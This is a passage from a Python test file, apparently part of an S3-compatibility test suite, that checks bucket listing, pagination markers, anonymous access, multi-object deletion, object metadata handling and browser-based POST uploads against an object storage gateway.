eq(hdrs['X-RGW-Quota-Bucket-Objects'], '-1')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='bucket list unordered')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
def test_bucket_list_unordered():
# boto3.set_stream_logger(name='botocore')
keys_in = ['ado', 'bot', 'cob', 'dog', 'emu', 'fez', 'gnu', 'hex',
'abc/ink', 'abc/jet', 'abc/kin', 'abc/lax', 'abc/mux',
'def/nim', 'def/owl', 'def/pie', 'def/qed', 'def/rye',
'ghi/sew', 'ghi/tor', 'ghi/uke', 'ghi/via', 'ghi/wit',
'xix', 'yak', 'zoo']
bucket_name = _create_objects(keys=keys_in)
client = get_client()
# adds the unordered query parameter
def add_unordered(**kwargs):
kwargs['params']['url'] += "&allow-unordered=true"
client.meta.events.register('before-call.s3.ListObjects', add_unordered)
# test simple retrieval
response = client.list_objects(Bucket=bucket_name, MaxKeys=1000)
unordered_keys_out = _get_keys(response)
eq(len(keys_in), len(unordered_keys_out))
eq(keys_in.sort(), unordered_keys_out.sort())
# test retrieval with prefix
response = client.list_objects(Bucket=bucket_name,
MaxKeys=1000,
Prefix="abc/")
unordered_keys_out = _get_keys(response)
eq(5, len(unordered_keys_out))
# test incremental retrieval with marker
response = client.list_objects(Bucket=bucket_name, MaxKeys=6)
unordered_keys_out = _get_keys(response)
eq(6, len(unordered_keys_out))
# now get the next bunch
response = client.list_objects(Bucket=bucket_name,
MaxKeys=6,
Marker=unordered_keys_out[-1])
unordered_keys_out2 = _get_keys(response)
eq(6, len(unordered_keys_out2))
# make sure there's no overlap between the incremental retrievals
intersect = set(unordered_keys_out).intersection(unordered_keys_out2)
eq(0, len(intersect))
# verify that unordered used with delimiter results in error
e = assert_raises(ClientError,
client.list_objects, Bucket=bucket_name, Delimiter="/")
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='bucket list unordered')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
@attr('list-objects-v2')
def test_bucket_listv2_unordered():
# boto3.set_stream_logger(name='botocore')
keys_in = ['ado', 'bot', 'cob', 'dog', 'emu', 'fez', 'gnu', 'hex',
'abc/ink', 'abc/jet', 'abc/kin', 'abc/lax', 'abc/mux',
'def/nim', 'def/owl', 'def/pie', 'def/qed', 'def/rye',
'ghi/sew', 'ghi/tor', 'ghi/uke', 'ghi/via', 'ghi/wit',
'xix', 'yak', 'zoo']
bucket_name = _create_objects(keys=keys_in)
client = get_client()
# adds the unordered query parameter
def add_unordered(**kwargs):
kwargs['params']['url'] += "&allow-unordered=true"
client.meta.events.register('before-call.s3.ListObjects', add_unordered)
# test simple retrieval
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=1000)
unordered_keys_out = _get_keys(response)
eq(len(keys_in), len(unordered_keys_out))
eq(keys_in.sort(), unordered_keys_out.sort())
# test retrieval with prefix
response = client.list_objects_v2(Bucket=bucket_name,
MaxKeys=1000,
Prefix="abc/")
unordered_keys_out = _get_keys(response)
eq(5, len(unordered_keys_out))
# test incremental retrieval with marker
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=6)
unordered_keys_out = _get_keys(response)
eq(6, len(unordered_keys_out))
# now get the next bunch
response = client.list_objects_v2(Bucket=bucket_name,
MaxKeys=6,
StartAfter=unordered_keys_out[-1])
unordered_keys_out2 = _get_keys(response)
eq(6, len(unordered_keys_out2))
# make sure there's no overlap between the incremental retrievals
intersect = set(unordered_keys_out).intersection(unordered_keys_out2)
eq(0, len(intersect))
# verify that unordered used with delimiter results in error
e = assert_raises(ClientError,
client.list_objects, Bucket=bucket_name, Delimiter="/")
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='invalid max_keys')
def test_bucket_list_maxkeys_invalid():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
# adds invalid max keys to url
# before list_objects is called
def add_invalid_maxkeys(**kwargs):
kwargs['params']['url'] += "&max-keys=blah"
client.meta.events.register('before-call.s3.ListObjects', add_invalid_maxkeys)
e = assert_raises(ClientError, client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='no pagination, no marker')
def test_bucket_list_marker_none():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
eq(response['Marker'], '')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='no pagination, empty marker')
def test_bucket_list_marker_empty():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='')
eq(response['Marker'], '')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='no pagination, empty continuationtoken')
@attr('list-objects-v2')
def test_bucket_listv2_continuationtoken_empty():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, ContinuationToken='')
eq(response['ContinuationToken'], '')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list keys with list-objects-v2')
@attr(assertion='no pagination, non-empty continuationtoken')
@attr('list-objects-v2')
def test_bucket_listv2_continuationtoken():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response1 = client.list_objects_v2(Bucket=bucket_name, MaxKeys=1)
next_continuation_token = response1['NextContinuationToken']
response2 = client.list_objects_v2(Bucket=bucket_name, ContinuationToken=next_continuation_token)
eq(response2['ContinuationToken'], next_continuation_token)
eq(response2['IsTruncated'], False)
key_names2 = ['baz', 'foo', 'quxx']
keys = _get_keys(response2)
eq(keys, key_names2)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list keys with list-objects-v2')
@attr(assertion='no pagination, non-empty continuationtoken and startafter')
@attr('list-objects-v2')
def test_bucket_listv2_both_continuationtoken_startafter():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response1 = client.list_objects_v2(Bucket=bucket_name, StartAfter='bar', MaxKeys=1)
next_continuation_token = response1['NextContinuationToken']
response2 = client.list_objects_v2(Bucket=bucket_name, StartAfter='bar', ContinuationToken=next_continuation_token)
eq(response2['ContinuationToken'], next_continuation_token)
eq(response2['StartAfter'], 'bar')
eq(response2['IsTruncated'], False)
key_names2 = ['foo', 'quxx']
keys = _get_keys(response2)
eq(keys, key_names2)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='non-printing marker')
def test_bucket_list_marker_unreadable():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='\x0a')
eq(response['Marker'], '\x0a')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='non-printing startafter')
@attr('list-objects-v2')
def test_bucket_listv2_startafter_unreadable():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='\x0a')
eq(response['StartAfter'], '\x0a')
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='marker not-in-list')
def test_bucket_list_marker_not_in_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='blah')
eq(response['Marker'], 'blah')
keys = _get_keys(response)
eq(keys, [ 'foo','quxx'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='startafter not-in-list')
@attr('list-objects-v2')
def test_bucket_listv2_startafter_not_in_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='blah')
eq(response['StartAfter'], 'blah')
keys = _get_keys(response)
eq(keys, ['foo', 'quxx'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='marker after list')
def test_bucket_list_marker_after_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Marker='zzz')
eq(response['Marker'], 'zzz')
keys = _get_keys(response)
eq(response['IsTruncated'], False)
eq(keys, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='startafter after list')
@attr('list-objects-v2')
def test_bucket_listv2_startafter_after_list():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, StartAfter='zzz')
eq(response['StartAfter'], 'zzz')
keys = _get_keys(response)
eq(response['IsTruncated'], False)
eq(keys, [])
def _compare_dates(datetime1, datetime2):
"""
changes ms from datetime1 to 0, compares it to datetime2
"""
# both times are in datetime format but datetime1 has
# microseconds and datetime2 does not
datetime1 = datetime1.replace(microsecond=0)
eq(datetime1, datetime2)
@attr(resource='object')
@attr(method='head')
@attr(operation='compare w/bucket list')
@attr(assertion='return same metadata')
def test_bucket_list_return_data():
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
data = {}
for key_name in key_names:
obj_response = client.head_object(Bucket=bucket_name, Key=key_name)
acl_response = client.get_object_acl(Bucket=bucket_name, Key=key_name)
data.update({
key_name: {
'DisplayName': acl_response['Owner']['DisplayName'],
'ID': acl_response['Owner']['ID'],
'ETag': obj_response['ETag'],
'LastModified': obj_response['LastModified'],
'ContentLength': obj_response['ContentLength'],
}
})
response = client.list_objects(Bucket=bucket_name)
objs_list = response['Contents']
for obj in objs_list:
key_name = obj['Key']
key_data = data[key_name]
eq(obj['ETag'],key_data['ETag'])
eq(obj['Size'],key_data['ContentLength'])
eq(obj['Owner']['DisplayName'],key_data['DisplayName'])
eq(obj['Owner']['ID'],key_data['ID'])
_compare_dates(obj['LastModified'],key_data['LastModified'])
# amazon is eventually consistent, retry a bit if failed
def check_configure_versioning_retry(bucket_name, status, expected_string):
client = get_client()
response = client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'MFADelete': 'Disabled','Status': status})
read_status = None
for i in range(5):
try:
response = client.get_bucket_versioning(Bucket=bucket_name)
read_status = response['Status']
except KeyError:
read_status = None
if (expected_string == read_status):
break
time.sleep(1)
eq(expected_string, read_status)
@attr(resource='object')
@attr(method='head')
@attr(operation='compare w/bucket list when bucket versioning is configured')
@attr(assertion='return same metadata')
@attr('versioning')
def test_bucket_list_return_data_versioning():
bucket_name = get_new_bucket()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(bucket_name=bucket_name,keys=key_names)
client = get_client()
data = {}
for key_name in key_names:
obj_response = client.head_object(Bucket=bucket_name, Key=key_name)
acl_response = client.get_object_acl(Bucket=bucket_name, Key=key_name)
data.update({
key_name: {
'ID': acl_response['Owner']['ID'],
'DisplayName': acl_response['Owner']['DisplayName'],
'ETag': obj_response['ETag'],
'LastModified': obj_response['LastModified'],
'ContentLength': obj_response['ContentLength'],
'VersionId': obj_response['VersionId']
}
})
response = client.list_object_versions(Bucket=bucket_name)
objs_list = response['Versions']
for obj in objs_list:
key_name = obj['Key']
key_data = data[key_name]
eq(obj['Owner']['DisplayName'],key_data['DisplayName'])
eq(obj['ETag'],key_data['ETag'])
eq(obj['Size'],key_data['ContentLength'])
eq(obj['Owner']['ID'],key_data['ID'])
eq(obj['VersionId'], key_data['VersionId'])
_compare_dates(obj['LastModified'],key_data['LastModified'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous)')
@attr(assertion='succeeds')
def test_bucket_list_objects_anonymous():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
unauthenticated_client = get_unauthenticated_client()
unauthenticated_client.list_objects(Bucket=bucket_name)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous) with list-objects-v2')
@attr(assertion='succeeds')
@attr('list-objects-v2')
def test_bucket_listv2_objects_anonymous():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_acl(Bucket=bucket_name, ACL='public-read')
unauthenticated_client = get_unauthenticated_client()
unauthenticated_client.list_objects_v2(Bucket=bucket_name)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous)')
@attr(assertion='fails')
def test_bucket_list_objects_anonymous_fail():
bucket_name = get_new_bucket()
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all objects (anonymous) with list-objects-v2')
@attr(assertion='fails')
@attr('list-objects-v2')
def test_bucket_listv2_objects_anonymous_fail():
bucket_name = get_new_bucket()
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.list_objects_v2, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='non-existant bucket')
@attr(assertion='fails 404')
def test_bucket_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.list_objects, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='non-existant bucket with list-objects-v2')
@attr(assertion='fails 404')
@attr('list-objects-v2')
def test_bucketv2_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.list_objects_v2, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='non-existant bucket')
@attr(assertion='fails 404')
def test_bucket_delete_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.delete_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='delete')
@attr(operation='non-empty bucket')
@attr(assertion='fails 409')
def test_bucket_delete_nonempty():
key_names = ['foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
e = assert_raises(ClientError, client.delete_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 409)
eq(error_code, 'BucketNotEmpty')
def _do_set_bucket_canned_acl(client, bucket_name, canned_acl, i, results):
try:
client.put_bucket_acl(ACL=canned_acl, Bucket=bucket_name)
results[i] = True
except:
results[i] = False
def _do_set_bucket_canned_acl_concurrent(client, bucket_name, canned_acl, num, results):
t = []
for i in range(num):
thr = threading.Thread(target = _do_set_bucket_canned_acl, args=(client, bucket_name, canned_acl, i, results))
thr.start()
t.append(thr)
return t
def _do_wait_completion(t):
for thr in t:
thr.join()
@attr(resource='bucket')
@attr(method='put')
@attr(operation='concurrent set of acls on a bucket')
@attr(assertion='works')
def test_bucket_concurrent_set_canned_acl():
bucket_name = get_new_bucket()
client = get_client()
num_threads = 50 # boto2 retry defaults to 5 so we need a thread to fail at least 5 times
# this seems like a large enough number to get through retry (if bug
# exists)
results = [None] * num_threads
t = _do_set_bucket_canned_acl_concurrent(client, bucket_name, 'public-read', num_threads, results)
_do_wait_completion(t)
for r in results:
eq(r, True)
@attr(resource='object')
@attr(method='put')
@attr(operation='non-existant bucket')
@attr(assertion='fails 404')
def test_object_write_to_nonexist_bucket():
key_names = ['foo']
bucket_name = 'whatchutalkinboutwillis'
client = get_client()
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='bucket')
@attr(method='del')
@attr(operation='deleted bucket')
@attr(assertion='fails 404')
def test_bucket_create_delete():
bucket_name = get_new_bucket()
client = get_client()
client.delete_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.delete_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='read contents that were never written')
@attr(assertion='fails 404')
def test_object_read_not_exist():
bucket_name = get_new_bucket()
client = get_client()
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
http_response = None
def get_http_response(**kwargs):
global http_response
http_response = kwargs['http_response'].__dict__
@attr(resource='object')
@attr(method='get')
@attr(operation='read contents that were never written to raise one error response')
@attr(assertion='RequestId appears in the error response')
def test_object_requestid_matches_header_on_error():
bucket_name = get_new_bucket()
client = get_client()
# get http response after failed request
client.meta.events.register('after-call.s3.GetObject', get_http_response)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='bar')
response_body = http_response['_content']
resp_body_xml = ET.fromstring(response_body)
request_id = resp_body_xml.find('.//RequestId').text
assert request_id is not None
eq(request_id, e.response['ResponseMetadata']['RequestId'])
def _make_objs_dict(key_names):
objs_list = []
for key in key_names:
obj_dict = {'Key': key}
objs_list.append(obj_dict)
objs_dict = {'Objects': objs_list}
return objs_dict
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects')
@attr(assertion='deletes multiple objects with a single call')
def test_multi_object_delete():
key_names = ['key0', 'key1', 'key2']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
eq(len(response['Contents']), 3)
objs_dict = _make_objs_dict(key_names=key_names)
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects(Bucket=bucket_name)
assert 'Contents' not in response
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects(Bucket=bucket_name)
assert 'Contents' not in response
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects with list-objects-v2')
@attr(assertion='deletes multiple objects with a single call')
@attr('list-objects-v2')
def test_multi_objectv2_delete():
key_names = ['key0', 'key1', 'key2']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
eq(len(response['Contents']), 3)
objs_dict = _make_objs_dict(key_names=key_names)
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects_v2(Bucket=bucket_name)
assert 'Contents' not in response
response = client.delete_objects(Bucket=bucket_name, Delete=objs_dict)
eq(len(response['Deleted']), 3)
assert 'Errors' not in response
response = client.list_objects_v2(Bucket=bucket_name)
assert 'Contents' not in response
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects has upper limit of 1000 keys')
@attr(assertion='fails 400')
def test_multi_object_delete_key_limit():
key_names = [f"key-{i}" for i in range(1001)]
bucket_name = _create_objects(keys=key_names)
client = get_client()
paginator = client.get_paginator('list_objects')
pages = paginator.paginate(Bucket=bucket_name)
numKeys = 0
for page in pages:
numKeys += len(page['Contents'])
eq(numKeys, 1001)
objs_dict = _make_objs_dict(key_names=key_names)
e = assert_raises(ClientError,client.delete_objects,Bucket=bucket_name,Delete=objs_dict)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='delete multiple objects has upper limit of 1000 keys with list-objects-v2')
@attr(assertion='fails 400')
def test_multi_objectv2_delete_key_limit():
key_names = [f"key-{i}" for i in range(1001)]
bucket_name = _create_objects(keys=key_names)
client = get_client()
paginator = client.get_paginator('list_objects_v2')
pages = paginator.paginate(Bucket=bucket_name)
numKeys = 0
for page in pages:
numKeys += len(page['Contents'])
eq(numKeys, 1001)
objs_dict = _make_objs_dict(key_names=key_names)
e = assert_raises(ClientError,client.delete_objects,Bucket=bucket_name,Delete=objs_dict)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write zero-byte key')
@attr(assertion='correct content length')
def test_object_head_zero_bytes():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='')
response = client.head_object(Bucket=bucket_name, Key='foo')
eq(response['ContentLength'], 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='write key')
@attr(assertion='correct etag')
def test_object_write_check_etag():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ETag'], '"37b51d194a7513e45b56f6524f2d51f2"')
@attr(resource='object')
@attr(method='put')
@attr(operation='write key')
@attr(assertion='correct cache control header')
def test_object_write_cache_control():
bucket_name = get_new_bucket()
client = get_client()
cache_control = 'public, max-age=14400'
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', CacheControl=cache_control)
response = client.head_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPHeaders']['cache-control'], cache_control)
@attr(resource='object')
@attr(method='put')
@attr(operation='write key')
@attr(assertion='correct expires header')
def test_object_write_expires():
bucket_name = get_new_bucket()
client = get_client()
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', Expires=expires)
response = client.head_object(Bucket=bucket_name, Key='foo')
_compare_dates(expires, response['Expires'])
def _get_body(response):
body = response['Body']
got = body.read()
if type(got) is bytes:
got = got.decode()
return got
@attr(resource='object')
@attr(method='all')
@attr(operation='complete object life cycle')
@attr(assertion='read back what we wrote and rewrote')
def test_object_write_read_update_read_delete():
bucket_name = get_new_bucket()
client = get_client()
# Write
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
# Read
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
# Update
client.put_object(Bucket=bucket_name, Key='foo', Body='soup')
# Read
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'soup')
# Delete
client.delete_object(Bucket=bucket_name, Key='foo')
def _set_get_metadata(metadata, bucket_name=None):
"""
create a new bucket new or use an existing
name to create an object that bucket,
set the meta1 property to a specified, value,
and then re-read and return that property
"""
if bucket_name is None:
bucket_name = get_new_bucket()
client = get_client()
metadata_dict = {'meta1': metadata}
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', Metadata=metadata_dict)
response = client.get_object(Bucket=bucket_name, Key='foo')
return response['Metadata']['meta1']
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-read')
@attr(assertion='reread what we wrote')
def test_object_set_get_metadata_none_to_good():
got = _set_get_metadata('mymeta')
eq(got, 'mymeta')
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-read')
@attr(assertion='write empty value, returns empty value')
def test_object_set_get_metadata_none_to_empty():
got = _set_get_metadata('')
eq(got, '')
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-write')
@attr(assertion='empty value replaces old')
def test_object_set_get_metadata_overwrite_to_empty():
bucket_name = get_new_bucket()
got = _set_get_metadata('oldmeta', bucket_name)
eq(got, 'oldmeta')
got = _set_get_metadata('', bucket_name)
eq(got, '')
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-write')
@attr(assertion='UTF-8 values passed through')
# TODO: the decoding of this unicode metadata is not happening properly for unknown reasons
@attr('fails_on_rgw')
def test_object_set_get_unicode_metadata():
bucket_name = get_new_bucket()
client = get_client()
def set_unicode_metadata(**kwargs):
kwargs['params']['headers']['x-amz-meta-meta1'] = u"Hello World\xe9"
client.meta.events.register('before-call.s3.PutObject', set_unicode_metadata)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
got = response['Metadata']['meta1'].decode('utf-8')
got = response['Metadata']['meta1']
print(got)
print(u"Hello World\xe9")
eq(got, u"Hello World\xe9")
def _set_get_metadata_unreadable(metadata, bucket_name=None):
"""
set and then read back a meta-data value (which presumably
includes some interesting characters), and return a list
containing the stored value AND the encoding with which it
was returned.
This should return a 400 bad request because the webserver
rejects the request.
"""
bucket_name = get_new_bucket()
client = get_client()
metadata_dict = {'meta1': metadata}
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='bar', Metadata=metadata_dict)
return e
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write/re-write')
@attr(assertion='non-UTF-8 values detected, but rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_non_utf8_metadata():
metadata = '\x04mymeta'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400 or 403)
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write')
@attr(assertion='non-printing prefixes rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_metadata_empty_to_unreadable_prefix():
metadata = '\x04w'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400 or 403)
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write')
@attr(assertion='non-printing suffixes rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_metadata_empty_to_unreadable_suffix():
metadata = 'h\x04'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400 or 403)
@attr(resource='object.metadata')
@attr(method='put')
@attr(operation='metadata write')
@attr(assertion='non-priting in-fixes rejected by webserver')
@attr('fails_strict_rfc2616')
@attr(assertion='fails 400')
def test_object_set_get_metadata_empty_to_unreadable_infix():
metadata = 'h\x04w'
e = _set_get_metadata_unreadable(metadata)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400 or 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='data re-write')
@attr(assertion='replaces previous metadata')
def test_object_metadata_replaced_on_put():
bucket_name = get_new_bucket()
client = get_client()
metadata_dict = {'meta1': 'bar'}
client.put_object(Bucket=bucket_name, Key='foo', Body='bar', Metadata=metadata_dict)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
got = response['Metadata']
eq(got, {})
@attr(resource='object')
@attr(method='put')
@attr(operation='data write from file (w/100-Continue)')
@attr(assertion='succeeds and returns written data')
def test_object_write_file():
bucket_name = get_new_bucket()
client = get_client()
data_str = 'bar'
data = bytes(data_str, 'utf-8')
client.put_object(Bucket=bucket_name, Key='foo', Body=data)
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
def _get_post_url(bucket_name):
endpoint = get_config_endpoint()
return '{endpoint}/{bucket_name}'.format(endpoint=endpoint, bucket_name=bucket_name)
@attr(resource='object')
@attr(method='post')
@attr(operation='anonymous browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_anonymous_request():
bucket_name = get_new_bucket_name()
client = get_client()
url = _get_post_url(bucket_name)
payload = OrderedDict([("key" , "foo.txt"),("acl" , "public-read"),\
("Content-Type" , "text/plain"),('file', ('bar'))])
client.create_bucket(ACL='public-read-write', Bucket=bucket_name)
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 204)
response = client.get_object(Bucket=bucket_name, Key='foo.txt')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='succeeds and returns written data')
def test_post_object_authenticated_request():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 1024]\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
